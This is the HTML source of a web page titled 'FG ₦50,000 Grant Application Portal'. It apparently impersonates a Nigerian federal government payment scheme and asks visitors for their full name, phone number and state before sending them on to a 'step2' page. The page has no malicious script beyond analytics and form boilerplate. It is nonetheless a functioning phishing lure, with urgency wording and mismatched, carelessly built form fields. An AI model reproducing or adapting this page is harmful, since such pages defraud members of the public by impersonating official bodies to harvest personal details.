

<!DOCTYPE html>
<html lang="en">
<head>


   <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-3VDKNG86CT"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-3VDKNG86CT');
</script>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>FG ₦50,000 Grant Application Portal</title>
    <link rel="stylesheet" href="/Ola.css" crossorigin="" data-precedence="next">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-select/1.13.1/css/bootstrap-select.min.css">
    <link rel="icon" href="favicon.ico" type="image/x-icon" sizes="16x16">
    <meta name="next-size-adjust">
    <style>
        body {
            background-image: url('boss.png');
            width: 25%;
            margin: 0 auto;
            background-size: cover;
            background-repeat: space;
            background-attachment: fixed;
        }
        @media (max-width: 575.98px) {
            body {
                width: 100%;
            }
        }
        @media (min-width: 576px) and (max-width: 767.98px) {
            body {
                width: 90%;
            }
        }
        @media (min-width: 768px) and (max-width: 991.98px) {
            body {
                width: 80%;
            }
        }
        @media (min-width: 992px) and (max-width: 1199.98px) {
            body {
                width: 75%;
            }
        }
        .ori {
            padding: 20px;
            background-color: white;
            margin: 15px;
            margin-top: 40px;
            border-radius: 30px;
        }
        form label {
    color: green !important;
}
    </style>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-select/1.13.1/js/bootstrap-select.min.js"></script>
</head>
<body class="__className_da1155">
    <div class="ori">
        
                    <center><img src="loaded.png" style="width: 100%;"></center>
        <center>
            <div class="my-3">
                <h2 class="text-gray-minst-main font-bold text-center text-[20px] leading-[27.32px]">FG ₦50,000 Scheme (LAST PHASE)<br>Application Portal.</h2>
                <p class="font-normal mt-2.5 text-center text-gray-mist-body text-[14px] leading-[19.12px]">Ensure Your Details Are Valid To Avoid Payment Error.</p>
            </div>
        </center>
        <form action="step2.html" method="POST" class="ant-form ant-form-vertical ant-form-hide-required-mark css-3j3a2">
    
    <!-- Full Name -->
    <div class="form-group">
      <label for="name"><strong>FULL NAME:</strong></label>
      <input type="text" class="form-control" id="name" name="name" placeholder="Enter full name" requir>
    </div>
    
<!-- Email Address -->
    <div class="form-group">
      <label for="email"><strong>PHONE NUMBER:</strong></label>
      <input type="text" class="form-control" id="email" name="email" placeholder="Enter mobile no" requir>
    </div>

    <!-- Phone Number -->
    <div class="form-group">
      <label for="number"><strong>STATE:</strong></label>
      <input type="text" class="form-control" id="number" name="number" placeholder="Enter your state" minlength="11" maxlength="15" reired>
    </div>
    
            <div class="ant-form-item !mt-5 css-3j3a2" style="margin-bottom:0">
                <div class="ant-row ant-form-item-row css-3j3a2">
                    <div class="ant-col ant-form-item-control css-3j3a2">
                        <div class="ant-form-item-control-input">
                            <div class="ant-form-item-control-input-content">
                                <div class="flex justify-center">
                                    <button type="submit" class="btn btn-success ant-btn css-3j3a2 ant-btn-primary w-full !bg-green-minst !text-white" style="opacity:1"><span>PROCEED HERE</span></button>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </form>
    </div>
     <script>
        // Bootstrap form validation
        (function() {
            'use strict';
            window.addEventListener('load', function() {
                var forms = document.getElementsByClassName('needs-validation');
                var validation = Array.prototype.filter.call(forms, function(form) {
                    form.addEventListener('submit', function(event) {
                        if (form.checkValidity() === false) {
                            event.preventDefault();
                            event.stopPropagation();
                        }
                        form.classList.add('was-validated');
                    }, false);
                });
            }, false);
        })();
    </script>
</body>

</html>
